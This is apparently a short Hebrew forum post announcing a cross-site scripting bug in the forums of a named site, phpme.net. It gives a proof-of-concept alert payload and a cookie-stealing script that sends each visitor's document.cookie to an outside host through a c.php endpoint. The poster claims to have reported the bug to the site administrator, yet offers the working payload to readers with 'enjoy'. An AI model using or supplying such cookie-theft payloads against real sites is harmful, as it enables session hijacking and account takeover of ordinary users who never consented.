הבאג מאפשר לגנוב את העוגייה של כל משתמש אשר יכנס לאינדקס הפורומים, או לפורום שבו נוצרה ההודעה, או להודעה עצמה.
קוד Alert
קוד:
<script>alert("XSS Bug Found..By Pr0T3cT10n");</script>
קוד לגניבת הקוקיס:
קוד:
<script>window.location.href="http://www.host.com/c.php?c="+document.cookie+"";</script>
הבאג נמצא ע"י Pr0T3cT10n (ז"א אני).
הבאג דווח למנהל האתר.
דף הבית שלהם:
http://www.phpme.net/
תהנו.